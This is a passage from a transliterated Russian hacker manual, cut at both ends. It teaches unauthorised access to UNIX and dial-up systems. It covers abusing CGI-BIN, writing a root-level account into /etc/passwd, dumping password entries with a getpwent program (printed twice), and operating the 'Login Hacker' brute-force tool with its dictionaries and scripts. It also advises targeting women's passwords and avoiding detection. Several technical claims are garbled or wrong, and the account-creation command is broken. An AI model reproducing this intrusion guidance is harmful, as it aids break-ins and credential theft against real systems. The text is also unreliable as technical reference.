vpolne polnocennyj  soft  (v  chastnosti,  kogda  vy  bluzhdaete  po  Web,  vy
ispol'zuete CGI). Soft etot (kak pravilo, kod pishetsya na yazyke scenariev
     Perl -- Practical Extraction  and Report Language)  hranitsya v kataloge
CGI-BIN  nuzhnogo vam  servera Web.  Haker  vzlamyvaet  server,  nahodit etot
katalog, zapuskaet programmu CGI, peredaet ej podgotovlennye im  dannye, ona
ih  obrabatyvaet,  vozvrashchaet   na  brouzer  hakera  rezul'tat  i,  nakonec,
preobrazovyvaet uzhe svoi dannye v nuzhnuyu hakeru gipertekstovuyu stranichku.
     Kak eto  delaetsya? Haker nazhimaet Submit  i brouzer  nachinaet  rabotat'
soglasno instrukciyam  operatora ACTION takim  obrazom  (proishodit  peredacha
klyuchej i  znachenij), chto udalennyj komp'yuter zapustit scenarij iz udalennogo
kataloga CGI-BIN. K ispolnyaemym fajlam kataloga CGI-BIN dostup  neogranichen.
Poetomu, k primeru, haker mozhet pomestit' v  etot katalog  programmu  chteniya
fajlov parolej ili nebol'shuyu pribludu, pozvolyayushchuyu zamenyat' fajly.
     Demony komand
     Esli vy hotite ustanovit' svyaz' s udalennym komp'yuterom  i zapustit' na
nem demona komandy finger, to poprobujte vstavit' vmesto name simvol kvakvy,
a posle kvakvy ukazat'  imya udalennogo komp'yutera ili  ego IP-adres (imeetsya
vvidu Telnet). Haker cherez etu zhe kvakvu mozhet zapustit' demona kakoj-nibud'
drugoj komandy. Rech' vsego-navsego idet o sintaksise nekotoryh komand.
     Telnetimsya i eshche raz telnetimsya
     Mnogie znayut, chto telnet ispol'zuetsya dlya:
     n registracii na udalennom komp'yutere.
     n ispol'zovaniya softa Internet, v tom
     chisle klientskih programm na
     udalennom komp'yutere.
     n zapuska lyubogo dostupnogo softa na
     udalennom komp'yutere.
     Haker obrashchaet vnimanie na poslednij  iz vysheperechislennyh faktov i  na
nizhesleduyushchie telnetovskie sajty:
     anarchy-online.com
     ntiabbs.ntia.doc.gov
     l0pht.com
     sfpg.gcomm.com
     telnet lust.isca.uiowa.edu port 2600
     pcspm2.dar.csiro.au
     prince.carleton.ca port 31337
     Lyubimye hakerami komandy UNIX
     Nizhe my  privodim  kratkoe  opisanie  komand  UNIX,  bez  kotoryh  etoj
operacionnoj sistemoj nikto by ne pol'zovalsya.
     at
     Vy ukazyvaete den'/chas kogda vypolnitsya komanda.
     batch
     Vypolnenie komand v processe zagruzki.
     chmod
     |toj komandoj vy mozhete izmenit' polnomochiya fajlovogo dostupa.
     chown
     Byl u fajla odin hozyain, a stal drugoj.
     cron
     |to demon tajmera, tochnee demon komand
     batch i at.
     crontab
     Vy mozhete ukazat' promezhutki vremeni, v techenie kotoryh budut vypolneny
kakie-libo komandy.
     ftp
     Rabotaem s udalennym komp'yuterom. Prinimaem ili peresylaem fajly.
     kill
     Poslat' nekotoromu processu signal o konce raboty.
     logname
     Hochu poluchit' registracionnoe imya.
     mail
     Priem ili peresylka elektronnyh soobshchenij.
     news
     Otobrazit' stat'yu iz konferencii Usenet.
     nslookup
     Poluchit' svedeniya ob IP-adrese domena.
     passwd
     Sozdat'/izmenit' parol'.
     ps
     Prosmotret', kakie processy v tekushchij moment vremeni aktivizirovany.
     pwcheck
     |toj komandoj vy mozhete proverit' fajl  parolej. Po umolchaniyu etot fajl
lezhit v kataloge /etc/passwd.
     rm
     Steret' fajl ili katalog.
     sleep
     Ne vypolnyat' komandu v konkretnyj promezhutok vremeni.
     su
     Umelo  ispol'zuya  etu  komandu,  haker  mozhet  stat'  privilegirovannym
pol'zovatelem.
     telnet
     Dostup k udalennomu komp'yuteru.
     umask
     Esli vy  tol'ko  sozdaete fajl, to  etoj komandoj vy mozhete zadat'  tak
nazyvaemuyu masku polnomochij etogo fajla.
     uucp
     Kopiruem fajly iz odnogo komp'yutera UNIX v drugoj.
     uuname
     Otobrazit' spisok hostov UUCP.
     uux
     Vypolnenie komand UNIX na udalennom komp'yutere.
     who
     Otobrazit' spisok tekushchih pol'zovatelej.
     whois
     Poluchit' informaciyu o tekushchem pol'zovatele.
     write
     Pereslat' zapisku tekushchemu pol'zovatelyu.
     Kogo vzlamyvayut v UNIX
     V mire hakerov i kiberpankov sushchestvuet nebol'shaya gradaciya yuzerov UNIX.
     n Technical Thug. Obychno sistemnyj
     programmist, pishushchij skripty na sed,
     C, awk, perl i APL.
     n Administrative Fascist. Zakonchennyj
     tuneyadec, vynuzhdennyj stat' sistemnym
     administratorom UNIX.
     n Maniac. Vzlomshchik s bol'shim opytom.
     Pravda, ego talant v oblasti
     komp'yuternogo shpionazha ne
     oplachivaetsya ni Mosadom, ni Kuboj.
     n Idiot. Obychno kretin ili staryj
     programmist na Kobole, vybrannyj
     sistemnym administratorom
     Mezhdunarodnym Komitetom kretinov.
     Lazejka, voznikayushchaya pri peredache fajlov cherez rcp
     Esli parametr rcp utverzhden  v  fajle config.tel,  to eto oznachaet, chto
otkryt dostup v sistemu iz Internet.
     Novyj ekaunt
     CHtoby sozdat' novyj ekaunt, haker ispol'zuet sleduyushchuyu konstrukciyu:
     # cd /home;
     mkdir "Bob's home directory"# echo "Bob Leontyef:
     gandalf:0:0::/dev/tty:compress -f" > /etc/passwd
     On  mozhet takzhe napisat'  scenarij  na Perl,  kotoryj  sozdaet ishodnyj
katalog i kopiruet dannye v /etc/passwd, /etc/shadow i /etc/group.
     Fajl parolej
     Dostup k  fajlu parolej  mozhet  byt'  dazhe u prostogo  pol'zovatelya.  V
standartnom UNIX fajl  parolej nahoditsya  v  kataloge  /etc/passwd. V drugih
sistemah etot fajl mozhet nahodit'sya v drugom meste. Krome togo, fajl parolej
mozhet byt' skrytym.
     Paroli  v   etom  fajle  zashifrovany.  Rasshifrovkoj   ili   izvlecheniem
zanimayutsya special'nye  programmy. Imenno oni i predostavlyayut  v ruki hakera
samyj glavnyj parol' -- superyuzera root.
     V fajle parolej soderzhatsya sem' idushchih po poryadku veshchej:
     n Username
     n Encrypted password
     n User number
     n Group Number
     n GECOS Information
     n Home directory
     n Shell
     Naprimer,  fajl  parolej  iz   /etc/passwd  mozhet  byt'  predstavlen  v
sleduyushchem vide:
     bob:5fg63fhD3d5gh:9406:12:BobLeontyef:/home/fsg/will:/bin/bash
     |ta zapis' perevoditsya tak:
     n Imya pol'zovatelya: bob
     n Rasshifrovka parolya: 5fg63fhD3d5gh
     n Nomer pol'zovatelya: 9406
     n Nomer gruppy: 12
     n Informaciya GECOS: Bob Leontyef
     n Katalog po umolchaniyu: /home/fsg/will
     n Shell: /bin/bash
     Unix-paroli  rasshifrovyvayutsya  tol'ko   odnim   sposobom.   Special'naya
programma  rasshifrovyvaet   tekst,  kotoryj  vvoditsya   v  pole  password  i
sravnivaet etot tekst s formoj deshifrovki.  Poetomu soft, kryakayushchij  paroli,
ispol'zuet  kollekciyu  razlichnyh  slov  ili  slovari. Kazhdoe  slovo v  takom
slovare rasshifrovyvaetsya i  sravnivaetsya  s  formoj  encrypted  postupayushchego
parolya.
     Luchshaya kryakalka parolej dlya Unix -- Crack  by Alec Muffett, dlya  DOS --
CrackerJack.
     V UNIX shiroko primenyaetsya sistema skrytyh parolej:  oblast' /etc/passwd
zamenyaetsya special'nym  simvolom,  a metod rasshifrovki  hranitsya v otdel'nom
kataloge, kotoryj dostupen tol'ko pol'zovatelyu root. Ataka na mnogie skrytye
paroli  osushchestvlyaetsya  cherez  special'no   napisannuyu   programmu,  kotoraya
ispol'zuet posledovatel'nye zaprosy k getpwent, naprimer:
     #include 
     main()
     {
     struct passwd *p;
     while(p=getpwent())
     printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
     p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
     }
     Malen'kij ishodnik dlya skrytogo fajla parolej
     #include 
     main ()
     {
     struct passwd *p;
     while(p=getpwent ())
     printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
     p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
     }
     Konfiguraciya Linux i podklyuchenie k udalennomu uzlu
     Skript udalennogo  podklyucheniya  lezhit v  /usr/local/sbin/initppp. Dalee
idut konstrukcii:
     #!/bin/sh
     PPPD = "/usr/sbin/pppd"
     $(PPPD) connect '/usr/sbin/chat -v "" ATZH0Q0M1 OK ATDT3560100 \
     CONNECT "" ogin: Suserid word: "`cat /etc/ppp/password`"' \
     /dev/modem 115200
     Fajl  v  /usr/sbin/pppd  yavlyaetsya  standartnym,  takim kak  /dev/modem.
Naprimer, /dev/cua1. Ustanovka  opcij dlya modema  prohodit cherez komandu  ln
-sf /dev/cua1 (dlya pervogo kommunikacionnogo porta).
     Fajl  parolej  lezhit v  /etc/ppp/password.  CHerez  skript  haker  mozhet
izmenit' parol' tak: `cat/etc/ppp/password`.
     Network Information System ili drevnie zheltye stranicy UNIX
     UNIX NIS pozvolyaet neskol'kim  komp'yuteram seti imet' razlichnyj uroven'
dostupa  k  konfiguracionnym fajlami. Esli atakuemaya  versiya UNIX ispol'zuet
NIS, to haker poluchit  fajl  parolej /etc/passwd  s  ochen' korotkoj strokoj,
tipa vot etoj:
     +::0:0:::
     CHtoby uvidet'  dejstvitel'nyj fajl  parolej  haker  ispol'zuet  komandu
ypcat passwd.
     Tainstvennyj znak posle zapyatoj
     |tot znak  sootvetstvuet vremeni  hraneniya parolya.  |to  oznachaet,  chto
parol' v opredelennyj  moment vremeni mozhet byt' zamenen pol'zovatelem posle
sistemnogo  administratora.  Parol'   pered  zamenoj  mozhet  eshche   hranit'sya
nekotoroe vremya.  Tipichnaya  zapis' /etc/passwd s  dannymi o vremeni hraneniya
parolya:
     bob:5fg63fhD3d,M.z8:9406:12:BobLeontyef:/home/fsg/will:/bin/bash
     Obratite vnimanie na zapyatuyu  v  oblasti deshifrovki parolya. Znak  posle
zapyatoj ispol'zuetsya tol'ko mehanizmom hraneniya parolya.
     Takim obrazom, simvoly, sootvetstvuyushchie dannym  vremeni hraneniya parolya
dlya vysheprivedennogo primera, budut takimi:
     M.z8
     |ti chetyre simvola interpretiruyutsya sleduyushchim obrazom:
     Maksimal'noe  chislo nedel', v  techenie  kotoryh parol'  ne  mozhet  byt'
izmenen.
     Minimal'noe   chislo   nedel',   v   techenie   kotoryh   parol'   dolzhen
ispol'zovat'sya pered zamenoj.
     Otmetim  tri vazhnye veshchi. Esli pervye i vtorye simvoly  ustanovleny kak
"..", to pol'zovatel' budet vynuzhden izmenit' svoj parol' v sleduyushchij raz. V
etom sluchae programma passwd udalit dannye o hranenii parolya.
     Esli  tretij i chetvertyj  simvoly ustanovleny kak "..", to pol'zovatel'
budet  vynuzhden izmenit' svoj  parol'  v  sleduyushchij  raz.  Dannye  o vremeni
hraneniya parolya budut sootvetstvovat' pervym i vtorym simvolam.
     Esli  zhe  pervyj  simvol  (MAX)  men'she  chem  vtoroj  simvol  (MIN), to
pol'zovatelyu  voobshche  ne  pozvolyayut izmenit' parol' (tol'ko  root mozhet  ego
izmenit').
     Zametim,  chto haker  ne mozhet  komandoj su  izmenit' dannye  o  vremeni
hraneniya parolya.
     Dostup k fajlu parolej sistemy VMS
     V VMS fajl parolej est'
     SYS$SYSTEM: SYSUAF.DAT
     Odnako, v otlichie ot pol'zovatelej UNIX, bol'shinstvo pol'zovatelej  VMS
ne  imeet dostupa dazhe k chteniyu etogo fajla. Haker mozhet vzlomat' parol' VMS
tol'ko  cherez special'nuyu programmu, kotoraya  ispol'zuet funkcii  SYS$GETUAF
dlya sravneniya rezul'tiruyushchih  rasshifrovannyh slov s rasshifrovannymi slovami,
poluchennymi iz dannyh SYSUAF.DAT. Dve takie programmy sleduyushchie:
     CHECK_PASSWORD i GUESS_PASSWORD.
     Vzlom po metodu Bivisa i Batt-Hedda
     |to odin iz priemov  ugadyvaniya parolya. Haker vhodit v set'. Pered  nim
polya dannyh dlya  vvoda logina i parolya. CHto on delaet? Ostavlyaet  etu set' v
pokoe. On vhodit v etu zhe set' po drugomu puti. CHerez  tu set',  k kotoroj u
nego  est' dostup. On telnetitsya  s  opredelennogo  adresa  IP  i  zapuskaet
programmu-vzlomshchik,  kotoraya  podbiraet  (zapuskaet na udalennom  komp'yutere
UNIX-programmu login) parol' i login, a  zatem eshche  i sama registriruetsya za
nego.
     Vzlom sistem cherez drevnij Login Hacker
     |ta bol'shaya i ves'ma gibkaya programma prednaznachena  dlya vzloma  mnogih
sistem. CHtoby proniknut' v sistemu, vy mozhete ispol'zovat' tri prilagaemyh k
programme fajla-slovarya, a takzhe Brute Force Generator. |ta programma  takzhe
mozhet ispol'zovat'sya sistemnymi  administratorami dlya proverki ih  sistem na
vshivost'.  Avtory  etoj programmy predosteregayut vas: ne  stoit pol'zovat'sya
etim  softom v  prestupnyh  celyah, otvechat'  pered  zakonom budete tol'ko vy
sami.  No,  s  drugoj storony, esli vy napishite horoshij  skript  (scenarij),
avtor  etoj  programmy  nadeetsya,  chto  vy  prishlete  ishodnik  po   adresu:
vh@campus.de.
     Konechno, bol'shinstvo sistem nahoditsya pod strogim nablyudeniem i  mnogie
terpyat neudachu pri popytkah registracii (srabatyvaet sistema zashchity, trevoga
i novichok poluchaet putevku v ne stol' otdalennye mesta). Mnogie servery b'yut
trevogu  uzhe  posle  desyati  neudachnyh  popytok  zaregistrirovat'sya  i,  kak
pravilo,  sistemnyj administrator  znaet chto delat' dal'she. Vprochem,  v Unix
imeyutsya  nekotorye  dyry,  pozvolyayushchie podbirat'  parol'  i imya pol'zovatelya
prakticheski bez srabatyvaniya sistemy zashchity servera, to  est' v konce-koncov
vy vhodite v sitemu. Dlya etogo vam nuzhen otrabotannyj v interaktivnom rezhime
skript i znanie nekotoryh komand Unix.
     |tu   programmu   vy   mozhete   effektivno   ispol'zovat'    v   staryh
telekommunikacionnyh sistemah, v  kotoryh chislo  popytok  zaregistrirovat'sya
neogranicheno.
     Dlya chego  nuzhen vzlom?  Konechno,  dlya  togo, chtoby  vojti  v sistemu. S
drugoj storony, avtor etoj programmy zapreshchaet pol'zovat'sya ej dlya polucheniya
kontrolya  nad vsej  sistemoj. |ta programma  prednaznachena prezhde  vsego dlya
teh, kto hochet poluchit'  tol'ko  odin  ekaunt.  Esli ego zarubyat,  vy mozhete
snova vospol'zovat'sya etoj programmoj. Tol'ko dlya etogo. Nikakogo kriminala.
     Mnogie paroli podbirayutsya legko. |to otnositsya k parolyam tak nazyvaemyh
srednih  pol'zovatelej.  Podbirat' parol', sootvetstvuyushchij ekauntu sitemnogo
administratora ves'ma-ves'ma chrevato. Naprimer, v Unix  pri etom srabatyvaet
special'naya sistema  zashchity i  voznikaet  soobshchenie ob  oshibke  (auth.crit):
CRITICAL. V sistemah NetWare  podobnaya  sistema nachinaet funkcionirovat' uzhe
posle neudachnyh registracij.  Pomnite, chto prakticheski vse sistemy pozvolyayut
registrirovat'sya v kachestve sistemnogo administratora tol'ko s  toj konsoli,
kotoraya  prinadlezhit  serveru   s  glavnoj  sistemoj.  Poetomu  nikogda   ne
vzlamyvajte rooturov, sistemnyh administratorov, krutyh  menedzherov i drugih
setepodobnyh lichnostej.
     Posle togo, kak vy vojdete v sistemu, poslednyaya stanet ves'ma uyazvimoj.
Poprobujte  poluchit' tekstovoj fajl s opisaniem modernizacii  servera, zatem
uznajte, kakie imeyutsya  dyrki. Esli vozniknut problemy, popytajtes' poluchit'
pomoshch' u znakomogo vam hakera.
     Kakih pol'zovatelej mozhno legko vzlamyvat'? Kak pravilo, paroli  zhenshchin
podbirayutsya legche (oni obychno ispol'zuyut  gostevuyu sistemu registracii), chem
paroli muzhchin. Poprobujte uznat'  nastoyashchee imya  pol'zovatelya,  a uzhe  zatem
podobrat'  ego   login,  zatem  lyubye  zhenskie   imena,  slova  iz   zhargona
futbolistov, cifry 123, slova tipa "secret" i t.d. V sistemah Unix dlya togo,
chtoby uznat'  login pol'zovatelya, mozhno vospol'zovat'sya komandoj finger  ili
cherez  komandu  telnet  votknut'sya  v  smtp-port  i  poluchit'  polnye  imena
pol'zovatelej.
     Obychno,  kogda  osushchestvlena  svyaz'   s  zaparolirovannoj  sistemoj  po
telefonnoj  linii,  vyvoditsya  priglashenie  "PASSWORD:".  ili  voobshche  ekran
okazyvaetsya pustym.
     Vazhno:  Dostatochno  legko  vzlomat'  tak  nazyvaemye  Silent  Carriers.
Delaetsya vse posredstvom skripta programmy Login Hacker.
     Fajly programmy
     LOGINH.EXE
     Programma Login Hacker.
     LH-COMP.EXE
     Kompilyator dlya skriptov.
     X00.EXE
     Drajver  Fossil.  Ispol'zujte  etot  drajver  pri vypolnenii programmy.
Zagruzhaetsya drajver tak: X00.EXE E 2
     FILE_ID.DIZ
     Kratkaya informaciya o programme.
     HISTORY.DOC
     Bibliografiya programmy.
     LOGINH.DOC
     Dokumentaciya.
     SCRIPT.DOC
     Dokumentaciya po skriptam.
     RESULT.DOC
     Rezul'tat v vide kodov, poluchennyj posle vypolneniya Login Hacker.
     UPDATE.DOC
     Informaciya o tom, kak mozhno obnovit' programmu.
     VH_BASE.DIC
     Osnovnoj slovar'.
     LH&SCAVE.TXT
     Primer skripta, kotoryj ispol'zuyutsya vmeste s Scavenger Dialer.
     THC&SCAV.SCR SCAVENGER
     Primer skripta, kotoryj nuzhen skriptu LH&SCAVE.TXT.
     REBREAK.SCR
     Primer Scavenger-skripta. On nuzhen dlya skripta LH&SCAVE.TXT.
     HANGUP.SCR
     Primer skripta, kotoryj nuzhen skriptu LH&SCAVE.TXT.
     PICKUP.SCR
     Primer skripta, kotoryj nuzhen skriptu LH&SCAVE.TXT.
     THC-LH_1.TXT
     Pervyj primer, pokazyvayushchij primenenie yazyka skriptov.
     THC-LH_2.TXT
     Vtoroj primer, pokazyvayushchij primenenie yazyka skriptov.
     DEC-SERV.TXT
     Horosho oprobovannyj skript (avtor: Tron).
     PASSCODE.TXT
     Drugoj skript (avtor: Mind Maniac).
     THC.NFO
     Ochen' vazhno! Vse, chto kasaetsya izvestnogo soobshchestva.
     LORE.COM
     Ispolnyaemyj skript dlya LORE BBS (avtor: Plasmoid).
     LOGINH.CFG
     Kofiguracionnyj fajl.
     LOGINH.LOG
     Sozdannyj  konfiguracionnyj   fajl.   Esli  konfiguracionnyj  fajl  uzhe
sushchestvuet,  to vse dannye budut dobavleny v ego konec. |tot fajl mozhet byt'
opredelen  v  sootvetstvuyushchem  skripte ili cherez  samu programmu  v  Hacking
Setup.
     LOGINH.SCR
     Skript, sozdannyj kompilyatorom LH-COMP.EXE. Tol'ko takie  skripty mogut
byt' zagruzheny v Login Hacker.
     LOGINH.HCK
     Esli proizoshlo vynuzhdennoe preryvanie programmy, to sozdaetsya etot fajl
s  podobnym  rasshireniem.  |tot   fajl   dannyh  ukazyvaet   na   ustanovki,
sootvetstvuyushchie pervonachal'nym  dannym slovarya  Brute  Force Generator. Esli
snova proizoshel sboj, to programma vydast soobshchenie s zaprosom  o tom, nuzhno
li  ispol'zovat' dannye iz  etogo fajla.  |to  daet vam vozmozhnost' prervat'
sessiyu  i ispol'zovat'  predydushchie dannye  v novoj atake.  Pomnite, chto etot
fajl ne yavlyaetsya skriptom. |to fajl registracii. Esli vy  zapisyvaete v etot
fajl  dannye, poluchennye ot drugoj ataki, programma vse  ravno poprosit  vas
ispol'zovat' tol'ko dannye predydushchej ataki.
     Komandy i parametry
     Pervaya  i  samaya  glavnaya  komanda  programmy  Login  Hacker  so  vsemi
vozmozhnymi parametrami vyglyadit tak:
     LOGINH.EXE [scriptfile]/[anything] [-Auto] [-Shh:mm] [Ehh:mm]
     [scriptfile]
     Avtomaticheski  zagruzhaet skompilirovannyj  skript scriptfile  i ozhidaet
vvoda klyucha dlya zagruzki.
     [anything]
     Esli etot parametr  ne est' sushchestvuyushchij fajl, to programma zapuskaetsya
bez demonstracionnyh soobshchenij.
     [-Auto]
     |tot parametr zagruzhaet skript bez dopolnitel'nogo klyucha.
     [-Shh:mm]
     Nachal'noe vremya, to est' poshla ataka.
     [-Ehh:mm]
     Vremya, v techenie kotorogo proishodilo skanirovanie.
     [-T]
     Zapusk  skripta  v  rezhime  proverki.  To est' skript ne zagruzhaetsya  v
modem.
     [-D]
     Aktivizaciya rezhima  otladki. V  etom rezhime  vy mozhete  vybrat',  kakuyu
komandu nuzhno vypolnyat' dal'she.
     Vtoraya,  ne  menee  vazhnaya  komanda  programmy  Login Hacker  so  vsemi
vozmozhnymi parametrami vyglyadit tak:
     LH-COMP.EXE [scriptfile]
     [scriptfile]
     Fajl, kotoryj budet podvergnut procedure kompilyacii.
     Ispol'zovanie Login Hacker
     Imeetsya pyat' opcij, neposredstvenno vliyayushchih na zapusk programmy:
     L
     Zagruzka otkompilirovannogo skripta i nachalo ataki.
     S
     Nastrojka modema i drugih osnovnyh parametrov programmy.
     T
     Terminal'nyj rezhim.
     I
     Nekotoraya informaciya.
     Q
     Vyhod.
     |kran v interaktivnom rezhime
     Rech'  idet o tom momente, kogda proizoshla zagruzka i zapustilsya skript.
Vse, chto  idet  iz modema, vyglyadit na vashem  ekrane simvolami belogo cveta.
Vse,  chto  zapisyvaetsya  v  fajl   registracii,  vyglyadit  na  vashem  ekrane
temno-sinimi  simvolami. Kazhdoe  soobshchenie sistemy,  v  tom  chisle  CONNECT,
ALARM,  HANGUP i  ERROR dolzhno otobrazhat'sya sinim cvetom.  Vse vysheskazannoe
spravedlivo lish' v tom sluchae, esli vy aktivizirovali  opciyu Print Logoutput
to Screen too.
     Goryachie klavishi v rezhime On-line
     ESC
     Pauza ili vyhod iz menyu.
     F1
     Poskazka.
     ALT-B
     Tak nazyvaemaya bazovaya klavisha. Pozvolyaet spryatat' ekran.
     ALT-C
     Ochistka ekrana.
     ALT-D
     Vklyuchit' ili vyklyuchit' rezhim otladki.
     ALT-H
     Vyzvat' menyu HangUp.
     ALT-I
     Otobrazit' na ekran statistiku i druguyu dopolnitel'nuyu informaciyu.
     ALT-J
     Prygnut' v DOS (ne pol'zujtes' etoj komandoj v beta-versiyah).
     ALT-L
     Osoboe menyu registracii.
     ALT-T
     Zagruzit'  terminal'nyj rezhim.  V etom rezhime  ekran  zavisaet, sistema
nahoditsya   pod   vashim   kontrolem.  Vy  mozhete  proizvesti   identifikaciyu
posredstvom lyuboj  iz  vysheopisannyh klavish  (krome  ESC).  CHtoby  vyjti  iz
terminal'nogo rezhima, nazhmite ALT-T ili ALT-X.
     Opisanie yazyka skriptov
     Skripty -- eto izyuminka Login Hacker. Poetomu, esli vy nauchites' pisat'
horoshie skripty, to smozhete vzlomat' prakticheski lyubuyu sistemu.  Konechno eto
ne otnositsya k novichkam  ili tem hakeram, kotorye nikogda ne programmirovali
dazhe na Bejsike.
     Skript  dolzhen  projti  cherez  kompilyator,  kotoryj  proveryaet  ego  na
vshivost'.  Poetomu vy mozhete  byt' uvereny na 99%, chto v  processe ataki  ne
proizojdet sboya po vine plohogo skripta.
     Itak, poehali.
     Vse,  chto  nachinaetsya s  tochki  s  zapyatoj  --  kommentarii.  Vse,  chto
nachinaetsya s dvoetochiya -- perehod na sleduyushchuyu komandu.
     CHetyre stroki, nachinayushchiesya s simvola # opredelyayut operatory, s kotoryh
nachinaetsya special'naya chast' skripta.
     Operator #DEFINE opredelyaet peremennuyu.
     Operator #NOCARRIER osushchestvlyaet avtomaticheskij  vozvrat  v programmu v
sluchae avarijnogo preryvaniya sessii, to est' bez komandy hangup.
     Operator #START aktiviziruet zagruzku skripta.
     Operator #END zakanchivaet vypolnenie skripta.
     Vse   peremennye   yavlyayutsya  neobyazatel'nymi.   Isklyuchenie   sostavlyayut
peremennye  logfile  i   phone_nr.  Vy   ne  mozhete  opredelyat'   kakie-libo
peremennye, za isklyucheniem teh, kotorye opisany nizhe.
     LOGFILE=FILENAME
     Opredelit'  fajl  registracii i mesto  na  diske  dlya etogo  fajla. |to
vazhnaya peremennaya ispol'zuetsya pri napisanii lyubogo skripta.
     Naprimer:
     LOGFILE=C:\OUTPUT\NY-SYS5.LOG
     PHONE_NR=NUMBER
     |ta  peremennaya  ispol'zuetsya  vmeste  s komandoj DIAL. Ee  telo  mozhet
sostoyat' kak iz cifr, tak i iz  bukv.  |to vtoraya peremennaya, kotoruyu vsegda
ispol'zuyut pri napisanii skriptov.
     Naprimer:
     PHONE_NR=1-800-WHO-CARES
     INIT_MODEM=STRING
     Esli vash  modem dolzhen rabotat'  v rezhime Pulse Dialing,  to  pomestite
pered   telefonnym  nomerom  argument  P.  Esli  zhe   vash   modem  ne  mozhet
inicializirovat'   strokovye   dannye,   pomestite   pered   sootvetstvuyushchim
telefonnym nomerom komandu AT (esli eta komanda otststvuet v Hacker Setup).
     Naprimer:
     INIT_MODEM=Z
     (zdes' takzhe mozhet stoyat' argument AT Z)
     INIT_DATA=STRING
     Inicializaciya  kanalov peredachi  dannyh,  v tom chisle stopovyh bitov  i
bitov chetnosti. Peremennaya  ispol'zuetsya v  tom sluchae, esli sootvetstvuyushchie
parametry  otsutstvuyut  v Hacker  Setup.  V  obshchem sluchae  argumentami  etoj
peremennoj  yavlyayutsya  nabory  simvolov  8N1 i  7E1, to est'  argument vsegda
dolzhen  sostoyat' iz  treh simvolov.  Pervyj  simvol --  eto cifry 7  ili  8,
yavlyayushchiesya bitami dannyh. Vtoroj simvol  mozhet byt' zapisan kak  P (kontrol'
po nechetnosti), E  (kontrol' po  chetnosti)  ili  N  (ne  kontrolirovat' bity
dannyh). Tretij simvol sootvetstvuet situacii, kogda na pervyj startovyj bit
nalagaetsya pervyj stopovyj bit:
     7/8+E/P/N+1/2.
     DIAL_TRIES=NUMBER
     |ta peremennaya opredelyaet kolichestvo  popytok nabora nomera v diapazone
ot  0 do 65535. Nol'  sootvetstvuet  beskonechnomu naboru nomera.  Esli nomer
nabran, zagruzhaetsya HANGUP i ostal'naya chast' skripta.
     Naprimer:
     DIAL_TRIES=3
     Standard : 0
     Vazhno: Esli eta peremennaya otsutstvuet v skripte, to budut ispol'zovany
ustanovki, sootvetstvuyushchie fajlu LOGINH.CFG.
     LOGIN_TRIES=NUMBER
     |ta  peremennaya  opredelyaet   kolichestvo  popytok  vhoda  v  sistemu  v
diapazone  ot  0 do  2300000000. Nol'  sootvetstvuet neogranichennoj  popytke
zaregestrirovat'sya.  Esli  v  fajle slovarya budet  dostignut tak  nazyvaemyj
konec kadra  (EOF),  to  skript  avtomaticheski povesit  trubku  i  prekratit
sessiyu.   Vremya,   v   techenie   kotorogo   budet    osushchestvlyat'sya   podbor
registracionnyh  dannyh zavisit  ot komand  pricepki SEND_NEXT_DIC, NEXT_DIC
ili im analogichnyh dlya slovarya Brute Force Generator.
     Naprimer:
     LOGIN_TRIES=0
     Standard: 0
     Vazhno:  Esli eta  peremennaya  otsutstvuet  v skripte,  to v atake budut
ispol'zovany ustanovki, sootvetstvuyushchie fajlu LOGINH.CFG.
     DIC(NUMBER)=FILENAME
     Opredelit' slovar', kotoryj budet ispol'zovan sootvetstvuyushchim skriptom.
Argument DIC ukazyvaet na sushchestvuyushchie fajly slovarej. Vy mozhete pricepit' k
skriptu  ot   odnogo  do  treh  slovarej.  Ispol'zujte  dlya  etogo   komandy
Send_Next_DIC (1), Send_DIC (1) i Next_DIC (1).
     Naprimer:
     DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
     FROM_DIC(NUMBER)=STRING
     Opredelit'  slovo,  nachinaya  s kotorogo  mozhno  ispol'zovat' slovar'  v
skripte.
     Naprimer: FROM_DIC(1)=Tracy
     BRUTE(NUMBER)=STRING,NUMBER,NUMBER,NUMBER
     Opredelit' slovar' Brute Force Generator dlya  ispol'zovaniya v  skripte.
Brute Force  Generator ves'ma gibok.  CHetyre  parametra slovarya  Brute Force
Generator  razdeleny zapyatoj. Nizhe opisyvaetsya priemlemaya specifikaciya  etih
parametrov.
     1
     a=bukvy nizhnego registra.
     A=bukvy verhnego registra.
     1=cifry.
     $=specsimvoly.
     ^=tak nazyvaemye kontroliruemye simvoly.
     Lyubye sinonimy ASCII.
     2
     |tot parametr soobshchaet  skriptu, kakoe  kolichestvo razlichnyh  simvolov,
sootvetstvuyushchih parametru 1 neobhodimo etomu skriptu.
     Kazhdoe  sgenerirovannoe  slovo,  sootvetstvuyushchee  parametru   1  vsegda
imeetsya v  takom  zhe  slove,  sootvetstvuyushchim parametru 2.  Simvol  verhnego
registra i odin nomer dopustimy. Velichina, sootvetstvuyushchaya nulyu nepriemlema.
     3
     Soobshchaet  skriptu  vozmozhnuyu  minimal'nuyu  dlinu  dlya  simvolov parolya,
podobrannogo pri ispol'zovanii slovarya Brute Force Generator.
     4
     Vozmozhnaya  maksimal'naya  dlina  dlya  simvolov  parolya, podobrannogo pri
ispol'zovanii slovarya Brute Force Generator.
     Vazhno: Minimal'naya dlina simvolov ravna  1, maksimal'naya  sootvetstvuet
12.
     Pomnite, chto  vy mozhete  ispol'zovat'  v atake  do treh  slovarej Brute
Force  Generator.  Ispol'zujte  dlya  etogo  velikolepnye   komandy  privyazki
Next_Brute(1), Send_Next_Brute(1) i Send_Brute(1).
     Naprimer:
     BRUTE(1)=a,1,1,6
     V  etom primere ispol'zuetsya pervyj parametr Brute Force  Generator  so
sleduyushchimi dannymi: proveryat' tol'ko simvoly nizhnego registra; predpolozhit',
chto  pri  podbore parolya v slovare prisutstvuet hotya by  odin dejstvitel'nyj
simvol; minimal'naya dlina registracionnogo slova ravna edinice, maksimal'naya
-- shesti.
     FROM_BRUTE(number)=STRING
     Nachat' inicializaciyu so slovarem Brute Force Generator. Pri etom  vazhno
sleduyushchee:  esli   inicializaciya  nachalas'   s   chetvertoj   bukvy,   a   vy
prosmatrivaete  diapazon ot 1  do 8  bukvy,  to  diapazon  ot  1 do  3 budet
